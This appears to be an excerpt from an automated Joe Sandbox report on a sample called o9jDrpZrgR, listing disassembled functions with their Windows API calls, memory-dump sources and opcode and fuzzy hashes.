                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
                                                              • Instruction ID: 656462f013d48cb08252272f53a5bead824e93a9521c6dbfe1eae595d8ab7c8d
                                                              • Opcode Fuzzy Hash: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
                                                              • Instruction Fuzzy Hash: 79012932504209BBDF165FA0DC05DEE7F62FF49750F054254FE24A5260CB368A31EB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008AA56F), ref: 008AAF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
                                                              • Instruction ID: de9331568bcff3a61742c0922afa6c87c6825e49f1f3794be7eb6e7e602ad9c8
                                                              • Opcode Fuzzy Hash: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
                                                              • Instruction Fuzzy Hash: D7F09A31645208BFDB1A6F54CC06CAEBF61FF45B21B004164F918EA360DA365A10DB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
                                                              • Instruction ID: 868073b7057d63e5bd573b7183ae70c8104030aa169b0e6f8d057c16a58b2a0d
                                                              • Opcode Fuzzy Hash: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
                                                              • Instruction Fuzzy Hash: 2AE05530680308BBE625AB28CC029AEBF54FB85721B0102A8F800E3740CE785E0082CA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089EAF9
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3So
                                                              • API String ID: 1269201914-1105799393
                                                              • Opcode ID: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
                                                              • Instruction ID: f84b2ee6dfd366e4bb5544eac0bb560373ca2412defc0c5b636cd7abbb32a1a3
                                                              • Opcode Fuzzy Hash: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
                                                              • Instruction Fuzzy Hash: 88B012C62AA4967D3904F2861D06C37070CF1F2BA0334843EF510D4191EC800C090432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008ABA89,?,00000000), ref: 008ABC64
                                                              • GetCPInfo.KERNEL32(00000000,008ABA89,?,?,?,008ABA89,?,00000000), ref: 008ABC77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
                                                              • Instruction ID: f5a905dde5093113e6ec6783333da020eeca2bf530b2e526e4eedc30eb88c64b
                                                              • Opcode Fuzzy Hash: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
                                                              • Instruction Fuzzy Hash: 37512370A002499FFB209F75C881ABABBE4FF43314F18406ED496CBA53DB3999458B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00889A50,?,?,00000000,?,?,00888CBC,?), ref: 00889BAB
                                                              • GetLastError.KERNEL32(?,00000000,00888411,-00009570,00000000,000007F3), ref: 00889BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
                                                              • Instruction ID: 799dacf2723fcb1e11c01015d494a070bb660b79e8127648151c440e203ac7de
                                                              • Opcode Fuzzy Hash: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
                                                              • Instruction Fuzzy Hash: 3E4189316043658FDB24AF29E58487AB7E6FF94320F188A2DE8C1C3260E770AD458B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008A97E5: GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
                                                                • Part of subcall function 008A97E5: _free.LIBCMT ref: 008A981C
                                                                • Part of subcall function 008A97E5: SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
                                                                • Part of subcall function 008A97E5: _abort.LIBCMT ref: 008A9863
                                                                • Part of subcall function 008ABB4E: _abort.LIBCMT ref: 008ABB80
                                                                • Part of subcall function 008ABB4E: _free.LIBCMT ref: 008ABBB4
                                                                • Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6
                                                              • _free.LIBCMT ref: 008ABA9F
                                                              • _free.LIBCMT ref: 008ABAD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID:
                                                              • API String ID: 2991157371-0
                                                              • Opcode ID: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
                                                              • Instruction ID: 792134673ad819dbd596e47b5211065e384e0701d7b2064c8c622cb34279858a
                                                              • Opcode Fuzzy Hash: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
                                                              • Instruction Fuzzy Hash: 6C31B331904219AFFB10DFA8D441B9977F5FF42320F214199E504DB6A3EB72AD41DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00881E55
                                                                • Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF
                                                              • _wcslen.LIBCMT ref: 00881EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
                                                              • Instruction ID: 522e3a0d2ed400f1dbb4d89520fa37962df6f54dca3a260a93cd85173f39206d
                                                              • Opcode Fuzzy Hash: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
                                                              • Instruction Fuzzy Hash: 42313671904209AECF11EF98C949AEEBBFAFF18310F1000AAF845E7251CB325E11CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
                                                              • Instruction ID: 140f6e357faee3c1a96e3083866257bcdaa15259238488885d45c81101edc2f2
                                                              • Opcode Fuzzy Hash: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
                                                              • Instruction Fuzzy Hash: 8021BD31248246EBCB14EA68C895ABABBE8FF95304F0C495CF4C5C7541D329E90D9B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00889F27,?,?,0088771A), ref: 008896E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00889F27,?,?,0088771A), ref: 00889716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
                                                              • Instruction ID: ce6bd1c0838b90ad1ea1f4e6c719d23c8647d200665847adf4c8f7cb3cc811d9
                                                              • Opcode Fuzzy Hash: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
                                                              • Instruction Fuzzy Hash: 9121C1711447446FE370AA69CC89BB777DCFB59324F180A19F9D5C21D1D774A8848731
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00889EC7
                                                              • GetLastError.KERNEL32 ref: 00889ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
                                                              • Instruction ID: c24a1dd0ee222b321738bbf3824bb1dd6bd9e0431831b5173b5b428b471d9f18
                                                              • Opcode Fuzzy Hash: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
                                                              • Instruction Fuzzy Hash: 5211E530600704ABD734E628C885BB6BBE9FF45370F544A69E592D26D0D7B0ED49C760
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A8E75
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008C1098,008817CE,?,?,00000007,?,?,?,008813D6,?,00000000), ref: 008A8EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
                                                              • Instruction ID: 804a14b939034d0c0276fe242f7fff0f116c127d3a3af78f23cdbda5a7d9223f
                                                              • Opcode Fuzzy Hash: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
                                                              • Instruction Fuzzy Hash: 64F0F632601115E6FB212A699C04B6F7B58FF93B70F640125F814EAD91DF70DD2091B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 008910AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 008910B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
                                                              • Instruction ID: 6e19b1d062f089252fbaf64cddf92562a34c7e37bd482a995652a473d4ef2d77
                                                              • Opcode Fuzzy Hash: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
                                                              • Instruction Fuzzy Hash: B8E0D832F0094AA7DF09A7B49C098EB73DDFA442043184175E403D3101F931DE424A60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008ABF30: GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
                                                                • Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C
                                                                • Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
                                                                • Part of subcall function 008ABF30: _free.LIBCMT ref: 008ABF95
                                                                • Part of subcall function 008ABF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4
                                                              • _free.LIBCMT ref: 008A82AE
                                                              • _free.LIBCMT ref: 008A82B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID:
                                                              • API String ID: 400815659-0
                                                              • Opcode ID: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
                                                              • Instruction ID: 0722d33a9c342ce78cebb11309a25d263c39cd94991073df543b595258edd631
                                                              • Opcode Fuzzy Hash: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
                                                              • Instruction Fuzzy Hash: 00E06D63A06D92D5B661327E6C4277B1608FB83378F550226FB20DB8C3DE50880645B7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
                                                              • Instruction ID: f3012db2c55a278b433b42355fc8f5693e50e42c3ce5a8ae8e5b81771a157e09
                                                              • Opcode Fuzzy Hash: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
                                                              • Instruction Fuzzy Hash: FEF0A03124010ABBEF016F60DC41FDA376CFF04385F488051B844D5160DB31EAD5DB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
                                                              • Instruction ID: e7064c559b8e5a3f805d41c10283807776a513d77457aa4de696e8a629ab139d
                                                              • Opcode Fuzzy Hash: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
                                                              • Instruction Fuzzy Hash: 2DE092311442096BEB11BF64DC45FDD775CFF08385F484061B944E2090EB61DE85DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,008B2641,000000FF), ref: 0089ACB0
                                                              • OleUninitialize.OLE32(?,?,?,?,008B2641,000000FF), ref: 0089ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
                                                              • Instruction ID: 27d68f5229bfb9cdb386b07a03c13d200503a9a5b9a885fbae1d6f2c9e2fcf60
                                                              • Opcode Fuzzy Hash: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
                                                              • Instruction Fuzzy Hash: 2BE06D72644650EFCB01EB5CDC46B49FBA9FB89B20F04436AF416D37A0CB74AC00CA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A254
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
                                                              • Instruction ID: f0a7ff0d7d600fd555ed5b1143d5821445c7a1fb189b57daf83ba3f82d615951
                                                              • Opcode Fuzzy Hash: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
                                                              • Instruction Fuzzy Hash: 9EE092315001289BDB20BB68CC05BD97B58FB183E1F044261FD44E31D0D770DE45CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0089DEEC
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0089DF03
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
                                                              • Instruction ID: c2391e393572009512b021594c4abb8b6304708fddf4cbe2bc5e334d57ee2355
                                                              • Opcode Fuzzy Hash: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
                                                              • Instruction Fuzzy Hash: 98E09B72404248A6DF01B764DC06F9F3B6CBB15785F040451B640DB0A2D974DA108766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
                                                              • Instruction ID: 7bd03da0e7c84895e1994dbab085862c834600add39f67f6edda2913994ec653
                                                              • Opcode Fuzzy Hash: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
                                                              • Instruction Fuzzy Hash: 72E04876504118BBDF11B794DC05FDA7BACFF093D1F0400657645E2104DA74DA84CBB0
